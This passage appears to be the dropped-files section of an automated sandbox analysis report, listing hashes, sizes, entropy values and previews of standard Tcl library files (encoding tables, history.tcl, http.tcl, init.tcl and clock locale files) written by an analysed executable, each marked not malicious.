                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: macUkraine, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..0410041104120413041404150416041704180419041A041B041C041D041E041F..0420042104220423042404250426042704280429042A042B042C042D042E042F..202000B0049000A300A7202200B6040600AE00A9212204020452226004030453..221E00B122642265045600B504910408040404540407045704090459040A045A..0458040500AC221A01922248220600AB00BB202600A0040B045B040C045C0455..20132014201C201D2018201900F7201E040E045E040F045F211604010451044F..04300431043204330
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):42552
                                                                                                                                                                                                                              Entropy (8bit):3.5565924983274857
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:w/RPrUHiJrwWkyY/W2wHiwWnwWOORY+gutSX:wVUid5JCurDGSX
                                                                                                                                                                                                                              MD5:EEB45AF9D7104872FE290D1EC18AB169
                                                                                                                                                                                                                              SHA1:A80CF4EA46301F0B8B4F0BC306270D7103753871
                                                                                                                                                                                                                              SHA-256:4A15ED210126BCDAE32543F60EB1A0677F985F32D49FCE923B9FAE8C5BCF3DA4
                                                                                                                                                                                                                              SHA-512:C359042B04441AA50E536B23EEA0C6C7B2C1893DFB9CDB5459D3B46945D3BB50FD7A32A4F4E26A83622E76D3D2BB0DBBC3D1F3FB87AAF40520A243165B82AB34
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: shiftjis, multi-byte..M..003F 0 40..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..0080000000000000000000850086008700000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000FF61FF62FF63FF64FF65FF66FF67FF68FF69FF6AFF6BFF6CFF6DFF6EFF6F..FF70FF71FF72FF73FF74FF75FF76FF77FF78FF79FF7AFF7BFF7CFF7DFF7EFF7F..FF80FF81FF82FF83FF84FF85FF86FF87FF88FF89FF8AFF8BFF8CFF8DFF8EFF8F..FF90FF91FF92FF93FF94FF95FF96FF97FF98FF99FF9AFF9BFF9CFF9DFF9EFF9F..0000000000000000000
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1111
                                                                                                                                                                                                                              Entropy (8bit):3.73983895892791
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:SdHkUlJvRjvRV7ZQsoRmSds2AsSemxUs+Jw1Viv6ObTXyn:avlJV7ZQsoRmosGSPxU/JOm6wTXyn
                                                                                                                                                                                                                              MD5:D59E748D863A5FAEF0CEEC2564E041A3
                                                                                                                                                                                                                              SHA1:4FFF3BE37F50C090FFC581F1C7769E20281E90C3
                                                                                                                                                                                                                              SHA-256:9660537A7B62996478555C6F57C1962C78FB3972F19370B2E395C44842818A1F
                                                                                                                                                                                                                              SHA-512:BF8FD0CF1CC55564C46976F53F441B26819ADBA7AB7BB04FF3FF5A313366FC3049DF29A839CCCB05EDEF4A7ECBB49FFCA62518EDA90AF2D7781874A8435073AE
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: symbol, single-byte..S..003F 1 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002122000023220300250026220D002800292217002B002C2212002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..22450391039203A70394039503A603930397039903D1039A039B039C039D039F..03A0039803A103A303A403A503C203A9039E03A80396005B2234005D22A5005F..F8E503B103B203C703B403B503C603B303B703B903D503BA03BB03BC03BD03BF..03C003B803C103C303C403C503D603C903BE03C803B6007B007C007D223C007F..0080008100820083008400850086008700880089008A008B008C008D008E008F..0090009100920093009400950096009700980099009A009B009C009D009E009F..000003D2203222642044221E0192266326662665266021942190219121922193..00B000B12033226500D7221D2202202200F72260226122482026F8E6F8E721B5..21352111211C21182297229522052229222A2283228722842282228622082209..2220220700AE00A92122220F221A22C500AC2227222821D421D021D121D221D3..22C42329F8E8F8E9F8EA2
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1112
                                                                                                                                                                                                                              Entropy (8bit):3.0553142874336943
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:ZlHVBUlJvRj7SOVbusZhAMiZyi77qsDHmEU4AyqU+TWwdd:PMlBVnrAMiwMmss4AyqUSd
                                                                                                                                                                                                                              MD5:467A67DE6809B796B914F5BFF98EF46D
                                                                                                                                                                                                                              SHA1:C62418071A6C9CB0DCE3F67E130BFD2FB7AB0B58
                                                                                                                                                                                                                              SHA-256:50B62381D6EDD4219F4292BFDC365954491B23360DE7C08033E7218A3D29C970
                                                                                                                                                                                                                              SHA-512:BF98305AA7D759A087B9EABDC404714D8DC6B4F1BEED4ED0E1FFE646641E1AECA307673D64CF95FD09546D977B3409D6C04F56DCCA1D6332B0D9B6DD460B77A9
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: tis-620, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E0000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..00000E010E020E030E040E050E060E070E080E090E0A0E0B0E0C0E0D0E0E0E0F..0E100E110E120E130E140E150E160E170E180E190E1A0E1B0E1C0E1D0E1E0E1F..0E200E210E220E230E240E250E260E270E280E290E2A0E2B0E2C0E2D0E2E0E2F..0E300E310E320E330E340E350E360E370E380E390E3A00000000000000000E3F..0E400E410E420E430E44
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8235
                                                                                                                                                                                                                              Entropy (8bit):4.855903177272536
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:Hf8PxPu7pUHBpqyzmY5rEk/fvs+AokFlTGHts1H/tsEGZPBtsLIVn++G:H6Pu7ELJTtyli8Ozz+L
                                                                                                                                                                                                                              MD5:8609B624CD3EC63DD02DBF89455C3A9B
                                                                                                                                                                                                                              SHA1:B3E1843E34C38AA668FFDDF435A1A65D55449CA0
                                                                                                                                                                                                                              SHA-256:5123DB837EADF45712EA7D449BC40BFD3E8E16D3D71E7D0CE9A32F164973D767
                                                                                                                                                                                                                              SHA-512:B20B75473F34209888F38EE570B8A96061760E88466DFC2EC55C814968DC7F67D92D255E8635188B60455B88F2D1D517747613AD0F366D60412D2D6ECE231B0E
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# history.tcl --..#..# Implementation of the history command...#..# Copyright (c) 1997 Sun Microsystems, Inc...#..# See the file "license.terms" for information on usage and redistribution of..# this file, and for a DISCLAIMER OF ALL WARRANTIES...#.....# The tcl::history array holds the history list and some additional..# bookkeeping variables...#..# nextid.the index used for the next history list item...# keep..the max size of the history list..# oldest.the index of the oldest item in the history.....namespace eval ::tcl {.. variable history.. if {![info exists history]} {...array set history {... nextid.0... keep.20... oldest.-20...}.. }.... namespace ensemble create -command ::tcl::history -map {...add.::tcl::HistAdd...change.::tcl::HistChange...clear.::tcl::HistClear...event.::tcl::HistEvent...info.::tcl::HistInfo...keep.::tcl::HistKeep...nextid.::tcl::HistNextID...redo.::tcl::HistRedo.. }..}.....# history --..#..#.This is the main history command. See the
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):10066
                                                                                                                                                                                                                              Entropy (8bit):4.806771544139381
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:kipkqA3KsZMAikGJ4kIWPa95KTBoF7dg/8YNkgQ4id:TkqWKsZ8kGJ4kIWPaDFzTd
                                                                                                                                                                                                                              MD5:C2092F8CA2D761DFA8C461076D956374
                                                                                                                                                                                                                              SHA1:90B4648B3BC81C30465B0BE83A5DB4127A1392FB
                                                                                                                                                                                                                              SHA-256:8C474095A3ABA7DF5B488F3D35240D6DE729E57153980C2A898728B8C407A727
                                                                                                                                                                                                                              SHA-512:09CE408886E2CEADDF70786A15D63AF9A930E70CAC4286AC9DDD2094C8EDCF97A2ADC2D3D2659B123F88719340D3B00D9F96E9BC7C8B55192735C290E7D24683
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# http.tcl..# Client-side HTTP for GET, POST, and HEAD commands...# These routines can be used in untrusted code that uses the Safesock..# security policy...# These procedures use a callback interface to avoid using vwait,..# which is not defined in the safe base...#..# See the http.n man page for documentation....package provide http 1.0....array set http {.. -accept */*.. -proxyhost {}.. -proxyport {}.. -useragent {Tcl http client package 1.0}.. -proxyfilter httpProxyRequired..}..proc http_config {args} {.. global http.. set options [lsort [array names http -*]].. set usage [join $options ", "].. if {[llength $args] == 0} {...set result {}...foreach name $options {... lappend result $name $http($name)...}...return $result.. }.. regsub -all -- - $options {} options.. set pat ^-([join $options |])$.. if {[llength $args] == 1} {...set flag [lindex $args 0]...if {[regexp -- $pat $flag]} {... return $http($flag)...} else {... return -code er
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):746
                                                                                                                                                                                                                              Entropy (8bit):4.711041943572035
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:jHx5XRsLzhjJS42wbGlTULuUAZb3KykszLl7+HkuRz20JSv6C3l5kMn:bHRsRJS42wbGlTUcZ+yk2Lli1z2jxXkM
                                                                                                                                                                                                                              MD5:A387908E2FE9D84704C2E47A7F6E9BC5
                                                                                                                                                                                                                              SHA1:F3C08B3540033A54A59CB3B207E351303C9E29C6
                                                                                                                                                                                                                              SHA-256:77265723959C092897C2449C5B7768CA72D0EFCD8C505BDDBB7A84F6AA401339
                                                                                                                                                                                                                              SHA-512:7AC804D23E72E40E7B5532332B4A8D8446C6447BB79B4FE32402B13836079D348998EA0659802AB0065896D4F3C06F5866C6B0D90BF448F53E803D8C243BBC63
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Tcl package index file, version 1.0..# This file is generated by the "pkg_mkIndex" command..# and sourced either when an application starts up or..# by a "package unknown" script. It invokes the..# "package ifneeded" command to set up package-related..# information so that packages will be loaded automatically..# in response to "package require" commands. When this..# script is sourced, the variable $dir must contain the..# full path name of this file's directory.....package ifneeded http 1.0 [list tclPkgSetup $dir http 1.0 {{http.tcl source {httpCopyDone httpCopyStart httpEof httpEvent httpFinish httpMapReply httpProxyRequired http_code http_config http_data http_formatQuery http_get http_reset http_size http_status http_wait}}}]..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:Tcl script, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):25633
                                                                                                                                                                                                                              Entropy (8bit):4.885492991636381
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:cXugPHudKlExBG+Xg3Qonlm6ofRRECLSQDjr5vkhzx/i:hgGdKli4eonlm6offLzehNi
                                                                                                                                                                                                                              MD5:FE92C81BB4ACDDA00761C695344D5F1E
                                                                                                                                                                                                                              SHA1:A87E1516FBD1F9751EC590273925CBC5284B16BD
                                                                                                                                                                                                                              SHA-256:7A103A85413988456C2AD615C879BBCB4D91435BCFBBE23393E0EB52B56AF6E2
                                                                                                                                                                                                                              SHA-512:C983076E420614D12AB2A7342F6F74DD5DCDAD21C7C547F660E73B74B3BE487A560ABD73213DF3F58BE3D9DBD061A12D2956CA85A58D7B9D9E40D9FA6E6C25EB
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# init.tcl --..#..# Default system startup file for Tcl-based applications. Defines..# "unknown" procedure and auto-load facilities...#..# Copyright (c) 1991-1993 The Regents of the University of California...# Copyright (c) 1994-1996 Sun Microsystems, Inc...# Copyright (c) 1998-1999 Scriptics Corporation...# Copyright (c) 2004 Kevin B. Kenny. All rights reserved...#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#....# This test intentionally written in pre-7.5 Tcl..if {[info commands package] == ""} {.. error "version mismatch: library\nscripts expect Tcl version 7.5b1 or later but the loaded version is\nonly [info patchlevel]"..}..package require -exact Tcl 8.6.13....# Compute the auto path to use in this interpreter...# The values on the path come from several locations:..#..# The environment variable TCLLIBPATH..#..# tcl_library, which is the directory containing this init.tcl script...# [t
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1038
                                                                                                                                                                                                                              Entropy (8bit):4.10054496357204
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:4EnLB383Hcm0hH9BncmtR7tK9dUVxMmALfpKIdzVJLd3xfjTuLM+vzkHWZ6tH9H0:4aR838HH9ekCkMmEfpK2xx2jiWZ0VbY
                                                                                                                                                                                                                              MD5:DA8BA1C3041998F5644382A329C3C867
                                                                                                                                                                                                                              SHA1:CA0BD787A51AD9EDC02EDD679EEEEB3A2932E189
                                                                                                                                                                                                                              SHA-256:A1EACA556BC0CFBD219376287C72D9DBBFAB76ECF9BF204FD02D40D341BAF7DA
                                                                                                                                                                                                                              SHA-512:4F086396405FDFE7FBDA7614D143DE9DB41F75BDBD3DB18B1EE9517C3DCCED238DD240B4B64829FD04E50F602DBF371D42A321D04C4C48E4B8B2A067CA1BAF2E
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset af DAYS_OF_WEEK_ABBREV [list \.. "So"\.. "Ma"\.. "Di"\.. "Wo"\.. "Do"\.. "Vr"\.. "Sa"].. ::msgcat::mcset af DAYS_OF_WEEK_FULL [list \.. "Sondag"\.. "Maandag"\.. "Dinsdag"\.. "Woensdag"\.. "Donderdag"\.. "Vrydag"\.. "Saterdag"].. ::msgcat::mcset af MONTHS_ABBREV [list \.. "Jan"\.. "Feb"\.. "Mar"\.. "Apr"\.. "Mei"\.. "Jun"\.. "Jul"\.. "Aug"\.. "Sep"\.. "Okt"\.. "Nov"\.. "Des"\.. ""].. ::msgcat::mcset af MONTHS_FULL [list \.. "Januarie"\.. "Februarie"\.. "Maart"\.. "April"\.. "Mei"\.. "Junie"\.. "Julie"\.. "Augustus"\.. "September"\.. "Oktober"\.. "November"\.. "Desember"\.. ""].. ::msgcat::mcset af AM "VM
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):257
                                                                                                                                                                                                                              Entropy (8bit):4.925537696653838
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSyEtJLl73oo6d3/xouFygMouFqF3v6ay/5ouFy9+3vR6HyFvn:4EnLB383RAgeYF3v6ay/RAI3voSVn
                                                                                                                                                                                                                              MD5:1B9DCD1C6FCDDC95AE820EA8DA5E15B8
                                                                                                                                                                                                                              SHA1:E8160353FD415BAB9FD5ACCA14E087C5E6AE836E
                                                                                                                                                                                                                              SHA-256:1548988458BBF0DFCCC23B7487CEC0E9C64E4CC8E045723E50BEC37C454A8C81
                                                                                                                                                                                                                              SHA-512:532AF060B95AED5E381B161BE56BC88D91A8F3DF2ACFD835491991F99FE752ADB4A3F93AB6D4E68F7042C28A3C1DD87A6312DFD9FFFAFD6ECE3F1B76837C5B7F
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset af_ZA DATE_FORMAT "%d %B %Y".. ::msgcat::mcset af_ZA TIME_FORMAT_12 "%l:%M:%S %P".. ::msgcat::mcset af_ZA DATE_TIME_FORMAT "%d %B %Y %l:%M:%S %P %z"..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2018
                                                                                                                                                                                                                              Entropy (8bit):4.477377447232708
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:4aR83gr/fsS/Sm8p4M/n1KsPktE30AiJcAxi9CEzdEvSCHvMSV:43UkiSm8p3nX0EzdCSCPV
                                                                                                                                                                                                                              MD5:D264D01B46D96455715114CAEDF9F05E
                                                                                                                                                                                                                              SHA1:A3F68A4C6E69433BD53E52B73041575F3B3AC3F2
                                                                                                                                                                                                                              SHA-256:B69D0061A728D59F89FF8621312789CD9F540BF2E2ED297804D22F6278561D85
                                                                                                                                                                                                                              SHA-512:A4163DAA6821B293EADD5D499E0641A8B7C93180C710D6B364AE8681A8FF6F35EC948C8DDBE960A8466AF1ACABC15B0D465A08B084617E8005D708459F7E74D3
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset ar DAYS_OF_WEEK_ABBREV [list \.. "\u062d"\.. "\u0646"\.. "\u062b"\.. "\u0631"\.. "\u062e"\.. "\u062c"\.. "\u0633"].. ::msgcat::mcset ar DAYS_OF_WEEK_FULL [list \.. "\u0627\u0644\u0623\u062d\u062f"\.. "\u0627\u0644\u0627\u062b\u0646\u064a\u0646"\.. "\u0627\u0644\u062b\u0644\u0627\u062b\u0627\u0621"\.. "\u0627\u0644\u0623\u0631\u0628\u0639\u0627\u0621"\.. "\u0627\u0644\u062e\u0645\u064a\u0633"\.. "\u0627\u0644\u062c\u0645\u0639\u0629"\.. "\u0627\u0644\u0633\u0628\u062a"].. ::msgcat::mcset ar MONTHS_ABBREV [list \.. "\u064a\u0646\u0627"\.. "\u0641\u0628\u0631"\.. "\u0645\u0627\u0631"\.. "\u0623\u0628\u0631"\.. "\u0645\u0627\u064a"\.. "\u064a\u0648\u0646"\.. "\u064a\u0648\u0644"\.. "\u0623\u063a\u0633"\.. "\u0633\u0628\u062a"\..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):265
                                                                                                                                                                                                                              Entropy (8bit):4.872222510420193
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSyEtJLl73oo6d3/xoKNvfcoKU3v6xyFjoKNo+3vfXM68vn:4EnLB3831vfD3v6g9F3vfc6+n
                                                                                                                                                                                                                              MD5:430498B4AB1E77C86BC1311A49747581
                                                                                                                                                                                                                              SHA1:684EAD965D9010C2A6E73DCACB2224FDE585F9FF
                                                                                                                                                                                                                              SHA-256:2E04B96DA002519D28125918A22FF2BB9659A668A7BCAD34D85DDDECEC8DC0B4
                                                                                                                                                                                                                              SHA-512:9F85A88A383DCFC54DAA6253D94C307A14B1CC91D5C97AF817B8122AF98025AB2430D0B2D656EBED09E78FB854D1F9CF99F3B791A6ECB7834112012739140126
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset ar_IN DATE_FORMAT "%A %d %B %Y".. ::msgcat::mcset ar_IN TIME_FORMAT_12 "%I:%M:%S %z".. ::msgcat::mcset ar_IN DATE_TIME_FORMAT "%A %d %B %Y %I:%M:%S %z %z"..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1851
                                                                                                                                                                                                                              Entropy (8bit):4.08645484776227
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:4aR83sxS/Sm819+es/Ii/R91bpH0+U0c+es/Ii/R91bpH0+UO:43wiSm815MbJbHgMbJbp
                                                                                                                                                                                                                              MD5:5C62D606F4F14BC8994B28F9622D70DD
                                                                                                                                                                                                                              SHA1:E99F8CC5D330085545B05B69213E9D011D436990
                                                                                                                                                                                                                              SHA-256:5ADBB3D37C3369E5FC80D6A462C82598D5A22FAEF0E8DF6B3148231D2C6A7F73
                                                                                                                                                                                                                              SHA-512:81AC9200459B0896E27A028BD089A174F7F921B0367BC8FF1AB33D3E561417B6F8EC23DAB750ECB408AC8A11CDFDBFA4F890F9E723BB8607B017C9FEE00928A0
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset ar_JO DAYS_OF_WEEK_ABBREV [list \.. "\u0627\u0644\u0623\u062d\u062f"\.. "\u0627\u0644\u0627\u062b\u0646\u064a\u0646"\.. "\u0627\u0644\u062b\u0644\u0627\u062b\u0627\u0621"\.. "\u0627\u0644\u0623\u0631\u0628\u0639\u0627\u0621"\.. "\u0627\u0644\u062e\u0645\u064a\u0633"\.. "\u0627\u0644\u062c\u0645\u0639\u0629"\.. "\u0627\u0644\u0633\u0628\u062a"].. ::msgcat::mcset ar_JO MONTHS_ABBREV [list \.. "\u0643\u0627\u0646\u0648\u0646 \u0627\u0644\u062b\u0627\u0646\u064a"\.. "\u0634\u0628\u0627\u0637"\.. "\u0622\u0630\u0627\u0631"\.. "\u0646\u064a\u0633\u0627\u0646"\.. "\u0646\u0648\u0627\u0631"\.. "\u062d\u0632\u064a\u0631\u0627\u0646"\.. "\u062a\u0645\u0648\u0632"\.. "\u0622\u0628"\.. "\u0623\u064a\u0644\u0648\u0644"\.. "\u062a\u0634\u0631\u064a\u0646 \u0627\u0644\u0623\u0648\u064
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1851
                                                                                                                                                                                                                              Entropy (8bit):4.083347689510237
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:4aR83LxS/Sm8S9+es/Ii/R91bpH0+U/c+es/Ii/R91bpH0+UO:431iSm8S5MbJbQgMbJbp
                                                                                                                                                                                                                              MD5:6FC1CC738207E2F8E0871103841BC0D4
                                                                                                                                                                                                                              SHA1:D2C62C7F6DA1EF399FCBE2BA91C9562C87E6152F
                                                                                                                                                                                                                              SHA-256:1FC13070CF661488E90FECE84274C46B1F4CC7E1565EAB8F829CCAA65108DFCA
                                                                                                                                                                                                                              SHA-512:E547D5CBB746654051AFDA21942075BC2224C2FF75D440C6C34C642AD24CF622E520FF919B8BD4AFC0116D9CE69B3ABA4E81EE247C1388F3C5741150201F5C60
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset ar_LB DAYS_OF_WEEK_ABBREV [list \.. "\u0627\u0644\u0623\u062d\u062f"\.. "\u0627\u0644\u0627\u062b\u0646\u064a\u0646"\.. "\u0627\u0644\u062b\u0644\u0627\u062b\u0627\u0621"\.. "\u0627\u0644\u0623\u0631\u0628\u0639\u0627\u0621"\.. "\u0627\u0644\u062e\u0645\u064a\u0633"\.. "\u0627\u0644\u062c\u0645\u0639\u0629"\.. "\u0627\u0644\u0633\u0628\u062a"].. ::msgcat::mcset ar_LB MONTHS_ABBREV [list \.. "\u0643\u0627\u0646\u0648\u0646 \u0627\u0644\u062b\u0627\u0646\u064a"\.. "\u0634\u0628\u0627\u0637"\.. "\u0622\u0630\u0627\u0631"\.. "\u0646\u064a\u0633\u0627\u0646"\.. "\u0646\u0648\u0627\u0631"\.. "\u062d\u0632\u064a\u0631\u0627\u0646"\.. "\u062a\u0645\u0648\u0632"\.. "\u0622\u0628"\.. "\u0623\u064a\u0644\u0648\u0644"\.. "\u062a\u0634\u0631\u064a\u0646 \u0627\u0644\u0623\u0648\u064
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1851
                                                                                                                                                                                                                              Entropy (8bit):4.084701680556524
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:4aR83lxS/Sm8M9+es/Ii/R91bpH0+UBc+es/Iv/I91bpH0+UO:43LiSm8M5MbJbSgMo0bp
                                                                                                                                                                                                                              MD5:8188C37CA44FEFFF8D895AAD503AD4F6
                                                                                                                                                                                                                              SHA1:C48F2E3B9FC055704D2DAFDC67E9D08EE6897D45
                                                                                                                                                                                                                              SHA-256:294F3E46C55453EDAD44567E1330F9B43E69A07FA0655B24DD2780A4490C1194
                                                                                                                                                                                                                              SHA-512:F86FCFC7C460473D46C472041AB2E1F9388CF34BCA9050295D1DAE454E35A2A0320D0C61D5E8CBB832AF74FFDD1A7511AF32EA2A53B481F39A1CBCF5F086D514
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
